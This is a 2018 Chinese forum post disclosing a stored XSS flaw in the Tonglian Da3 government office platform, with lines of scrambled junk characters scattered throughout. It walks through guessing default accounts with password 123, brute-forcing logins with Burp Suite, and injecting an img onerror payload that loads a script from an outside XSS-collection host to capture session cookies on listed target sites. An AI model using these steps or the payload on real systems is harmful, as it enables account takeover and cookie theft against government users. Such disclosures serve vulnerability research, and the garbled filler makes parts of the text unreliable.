- w8 @9 V i* G& m& |, Q
' |* S* a5 B* B- U6 m
同联Da3协同办公平台后台通用储存型xss漏洞
$ ]5 v+ y. x$ v' a
/ U7 M6 C& v% R5 U; r
7 h5 v4 b3 s. z; c9 V 平台简介:
# A0 z$ ^, @. ^2 a! |
) ?( q Z7 G4 T+ u: H- j
% `4 y, V/ q' V, \) \
% N9 ^& r& J; F8 R( h7 R# Y& Z
* U$ w' B, z2 {! E: S% I
/ I+ o% R3 V# p3 K2 }& f: A+ l 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
9 |$ T w/ Z% P1 Z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 b9 v! Q/ F4 G) p7 o. T2 b同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
5 t, j% ?( s; `% o: {' |
+ J1 Z/ i4 h0 W h: x( s" t2 f
0 F2 C% f" s2 A2 ]4 k! L
) Y, ]3 A$ o5 O, i
- `2 U7 g& \) O) q4 v/ v" y 5 z9 I# h! `* o. W0 d
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 w. Y. `! _' D0 j
' o: p) E* V- d+ g
s# O/ X9 N. w& k
; N3 T! p) X5 H4 M
+ R* K2 K) e4 }
- H! ?4 I6 S z& y1 s http://1.1.1.1:7197/cap-aco/#(案例2-)
& M/ q1 C- O; E" {. C- Z
* i, g; p, X, h
; O! n3 c% F' z1 G3 j/ p8 Q+ x- V http://www.XXOO.com (案例1-官网网站)! K7 f s# w$ Y; m
* S6 P0 l% T( v
, ~# L, J2 h+ S7 n8 Y9 ~ 漏洞详情:
0 F& _0 Z& }' q* M4 }4 R
1 }( n0 r8 S( B
. S- `' H: X& Z X
案例一、
# \2 {& H. ], A O! h1 M
; @: {% n! v, g4 x0 L* a& C: b : B# t$ U' L4 O- c2 q" M
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
2 s6 R* Y" r3 V3 W
' h0 Y/ u! Y6 Z
% x% {7 t# R* Q D7 M3 n2 A6 Q 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
. a. s/ B3 Z- u/ t) G6 H
% @1 C& _3 }/ k/ R1 R) u
) C. g3 m) x) {& Z
5 X: \. `# A9 V2 S4 R
1 [# R: N: j* W r
7 z7 y g" ]& L% S 
2 n# F6 G* }! l( t2 n
5 d4 i1 c( N& {
' U$ m1 s- y# E/ c, ^1 P
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
! n3 l0 L, {3 P, n( ^4 A
! z4 o" }: ~6 k1 l) \9 h) F
4 v. c: W6 f2 l4 p2 m
& i- c' i2 b' f) P$ |
1 ~6 L; ?& ~3 }1 _* [) Z* p d0 E
) P. U6 S! e! f( B0 B: l" ? 
; a% ~: i5 o! X& k
3 f/ T- h. t. d* I3 I- ?% _
: {1 b" L2 ?2 O5 ^- s5 \( p
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ~1 T; o+ q, z1 P
% n& u( O0 ?1 P7 y* H6 t3 t' F7 }. I
' J m. g# k7 g$ _' `0 ]
E0 d- s3 w% `5 p; j# G
: w6 l/ z0 g6 t. R
9 \5 G$ |4 _) C# l1 t
<img src=x
+ s1 q* V' B, D" M0 tonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: % k' h8 M& r: p9 v# a' j
" U; d! F: d" D( Z5 p7 o9 L
+ c W! v7 P4 r% D 
6 ^, m' C( N' Z6 f2 V. p: m7 q( v( x
) g' Y0 U5 f9 X4 Z
0 T. }% r) v+ G0 F 然后发送,接收cookie如图: 4 Q+ p6 z" l$ U# M) Q
/ P$ t2 S7 ?5 B5 P P6 B$ R# `0 T1 r d
' _3 ~% X9 q% _
5 f/ e& u3 D3 v( @6 j0 ]. W
( K }4 L- C4 z6 d% P/ k
8 \3 r2 m) q- v
: Z+ y7 o5 O) ]& F5 z d
f& _) a5 T0 f2 z8 ] - q+ f) m8 f; C5 ]
+ d: ^$ J6 d; F2 Y9 m5 P# |
4 }0 K4 w. `, W* e' S# ]
7 X. Q3 ?, w) R' A2 x
7 r% w7 b' J/ I, N+ j5 ~
0 I P/ k4 e- x5 |) s
- X: l) \4 b8 D. G v/ u- C g7 `
/ x- v; p. y/ n # }5 @9 a% S. Q- t
" _3 K; `( p, s. N$ D. x/ E
, w# v: g# R$ M8 E
5 n" K; i* P6 L( b0 |1 p# S5 v( W7 o 9 `4 d+ I% _; \0 m: t' d
9 j: v$ ]8 |, F7 r7 ^# O! b1 q
! m+ N; q5 ^! m* H+ c 案例2、
- P: O0 N, ?& b% G
* J. v7 @, J+ }' I+ T' v
2 B/ W) r+ K4 y3 `% [
前面步骤都一样,下面看效果图: " z' A/ o! v! v3 [7 d
3 V* r4 I8 @+ W# v7 _
1 T6 X6 u8 T4 s% _+ o/ I 
4 q2 Z4 Y4 ^# M9 i6 x
H% r3 c) Q0 O x
4 X( b# J! R" i1 ? 
$ i6 R2 W2 M9 n! c; ~7 P
0 w8 [+ M$ `& X; |$ K0 ~
" Y2 d1 c5 i# g0 P" L
b3 t5 q7 m7 R+ K: X$ |
2 ?0 X, N6 x* W) Y! P5 G . }+ W" R: t5 Q1 w V
0 v- F: ?: S" u, s5 \. ?* c
0 ^6 w; M8 c& O: _3 ^
$ B/ P d1 ~0 z5 Z. I$ d" h* e" u: P
6 N; g) T: Q* U! i
( m. J5 F Z& `! J
) S- R. B3 E4 l. \+ [ 4 z; l" z$ O2 D9 S
( T$ L6 a6 C3 ?4 I& k - _9 b- ^6 n: C3 G6 i
( k9 O, u+ t3 ]( E: X# K
, W! l; |& R/ t3 e# P- _* @7 h+ A
* M; _% g: D' X' q. H
' w9 H/ A; {: b; [0 j
3 }8 `: v2 l# k/ J
+ g9 y/ ~ _9 Q3 a1 H! t
" F* |2 k) Q, J8 q1 \* l' y
0 X; @7 ~$ y& S Z- A: W
发表于 2018-10-20 20:14:15
收藏
支持
反对